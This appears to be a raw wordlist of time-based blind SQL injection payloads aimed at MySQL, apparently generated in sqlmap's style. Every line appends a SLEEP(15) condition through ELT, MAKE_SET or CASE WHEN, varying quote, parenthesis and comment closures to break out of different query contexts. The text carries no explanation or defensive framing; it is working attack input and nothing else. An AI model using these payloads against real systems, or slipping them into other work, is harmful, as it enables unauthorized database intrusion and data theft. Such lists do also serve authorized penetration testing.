 AND ELT(7941=7941,SLEEP(15))# YdtZ
') WHERE 7932=7932 AND ELT(7941=7941,SLEEP(15))-- 
") WHERE 5355=5355 AND ELT(7941=7941,SLEEP(15))-- 
) WHERE 7797=7797 AND ELT(7941=7941,SLEEP(15))-- 
' WHERE 7922=7922 AND ELT(7941=7941,SLEEP(15))-- 
" WHERE 3144=3144 AND ELT(7941=7941,SLEEP(15))-- 
 WHERE 2720=2720 AND ELT(7941=7941,SLEEP(15))-- 
')) AS upUM WHERE 9089=9089 AND ELT(7941=7941,SLEEP(15))-- 
")) AS JuXe WHERE 5812=5812 AND ELT(7941=7941,SLEEP(15))-- 
)) AS XIqV WHERE 6801=6801 AND ELT(7941=7941,SLEEP(15))-- 
') AS nNAm WHERE 3863=3863 AND ELT(7941=7941,SLEEP(15))-- 
") AS kOLH WHERE 7248=7248 AND ELT(7941=7941,SLEEP(15))-- 
) AS LtjW WHERE 8752=8752 AND ELT(7941=7941,SLEEP(15))-- 
'||(SELECT 'OhrG' FROM DUAL WHERE 5742=5742 AND ELT(7941=7941,SLEEP(15)))||'
'||(SELECT 'hBfo' WHERE 5704=5704 AND ELT(7941=7941,SLEEP(15)))||'
'+(SELECT EJtE WHERE 7294=7294 AND ELT(7941=7941,SLEEP(15)))+'
'+(SELECT 'gsZR' WHERE 1804=1804 AND ELT(7941=7941,SLEEP(15)))+'
' IN BOOLEAN MODE) AND ELT(7941=7941,SLEEP(15))#
) AND ELT(5757=5757,SLEEP(15))#
') AND ELT(5757=5757,SLEEP(15))#
' AND ELT(5757=5757,SLEEP(15))#
" AND ELT(5757=5757,SLEEP(15))#
)) AND ELT(5757=5757,SLEEP(15))#
))) AND ELT(5757=5757,SLEEP(15))#
 AND ELT(5757=5757,SLEEP(15))#
')) AND ELT(5757=5757,SLEEP(15))#
'))) AND ELT(5757=5757,SLEEP(15))#
") AND ELT(5757=5757,SLEEP(15))#
")) AND ELT(5757=5757,SLEEP(15))#
"))) AND ELT(5757=5757,SLEEP(15))#
%') AND ELT(5757=5757,SLEEP(15))#
%')) AND ELT(5757=5757,SLEEP(15))#
%'))) AND ELT(5757=5757,SLEEP(15))#
%' AND ELT(5757=5757,SLEEP(15))#
%") AND ELT(5757=5757,SLEEP(15))#
%")) AND ELT(5757=5757,SLEEP(15))#
%"))) AND ELT(5757=5757,SLEEP(15))#
%" AND ELT(5757=5757,SLEEP(15))#
%00') AND ELT(5757=5757,SLEEP(15))#
%00')) AND ELT(5757=5757,SLEEP(15))#
%00'))) AND ELT(5757=5757,SLEEP(15))#
%00' AND ELT(5757=5757,SLEEP(15))#
') WHERE 4317=4317 AND ELT(5757=5757,SLEEP(15))#
") WHERE 5819=5819 AND ELT(5757=5757,SLEEP(15))#
) WHERE 8241=8241 AND ELT(5757=5757,SLEEP(15))#
' WHERE 1046=1046 AND ELT(5757=5757,SLEEP(15))#
" WHERE 7231=7231 AND ELT(5757=5757,SLEEP(15))#
 WHERE 6629=6629 AND ELT(5757=5757,SLEEP(15))#
')) AS MFQW WHERE 6430=6430 AND ELT(5757=5757,SLEEP(15))#
")) AS MYln WHERE 9611=9611 AND ELT(5757=5757,SLEEP(15))#
)) AS pXHj WHERE 6371=6371 AND ELT(5757=5757,SLEEP(15))#
') AS tNkp WHERE 5306=5306 AND ELT(5757=5757,SLEEP(15))#
") AS Bstj WHERE 2248=2248 AND ELT(5757=5757,SLEEP(15))#
) AS bsxl WHERE 8296=8296 AND ELT(5757=5757,SLEEP(15))#
'||(SELECT 'NAgw' FROM DUAL WHERE 1359=1359 AND ELT(5757=5757,SLEEP(15))#
'||(SELECT 'aKwp' WHERE 9178=9178 AND ELT(5757=5757,SLEEP(15))#
'+(SELECT PKvG WHERE 8446=8446 AND ELT(5757=5757,SLEEP(15))#
'+(SELECT 'nGPF' WHERE 9871=9871 AND ELT(5757=5757,SLEEP(15))#
' IN BOOLEAN MODE) AND ELT(5757=5757,SLEEP(15))#
(SELECT (CASE WHEN (5145=5145) THEN SLEEP(15) ELSE 5145*(SELECT 5145 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
(SELECT * FROM (SELECT(SLEEP(15)))jaQv)
(9765=9765 AND SLEEP(15))
ELT(7807=7807,SLEEP(15))
MAKE_SET(5510=5510,SLEEP(15))
',(SELECT (CASE WHEN (9219=9219) THEN SLEEP(15) ELSE 9219*(SELECT 9219 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
,(SELECT (CASE WHEN (9219=9219) THEN SLEEP(15) ELSE 9219*(SELECT 9219 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
